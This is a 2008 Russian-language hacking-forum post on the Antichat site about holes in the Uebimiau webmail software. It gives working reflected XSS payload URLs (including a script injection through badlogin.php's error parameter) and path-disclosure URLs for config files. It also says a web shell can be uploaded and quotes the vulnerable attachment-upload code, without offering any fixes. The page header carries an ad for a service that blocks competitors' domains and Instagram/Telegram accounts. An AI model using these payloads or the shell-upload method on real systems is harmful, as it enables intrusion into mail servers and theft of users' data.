VIDEO.ANTICHAT.XYZ

НОВЫЕ СООБЩЕНИЯ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Пассивная XSS в Uebimiau V2.7.10 и более ранних версиях

Опции темы

Поиск в этой теме

Опции просмотра

Предыдущая

Предыдущее сообщение

Следующее сообщение

Следующая

#5

Старый

04.11.2008, 21:26

Аватар для l1ght

l1ght

Reservists Of Antichat - Level 6

Регистрация: 05.12.2006

Сообщений: 195

Провел на форуме:
14023893

Репутация: 2163

По умолчанию

оказалось не 1ый '(
1. не обязательно post

Цитата:

http://old.antichat.ru/webmail/index.php?f_email=">xeka

2.ещё xss

Цитата:

http://old.antichat.ru/webmail/badlogin.php?error=<script>confirm(/xeka/)</script>

3. пути

Цитата:

http://old.antichat.ru/webmail/index.php?tid[]=
http://old.antichat.ru/webmail/inc/inc.php
http://old.antichat.ru/webmail/inc/config.php

4.заливка шелла актуальна на ласт.ревах

Цитата:

Сообщение от Uebimiau 2.7.2

...
elseif (is_uploaded_file($userfile) || is_uploaded_file($userfile["tmp_name"])) {
$userfile_name = $userfile["name"];
$userfile_type = $userfile["type"];
$userfile_size = $userfile["size"];
$userfile = $userfile["tmp_name"];
}
...
$filename = $userfolder."_attachments/".md5(uniqid("")).$userfile_name;

move_uploaded_file($userfile, $filename);

Ответить с цитированием

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале	Mo4x	Чужие Статьи	6	19.07.2007 16:13
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход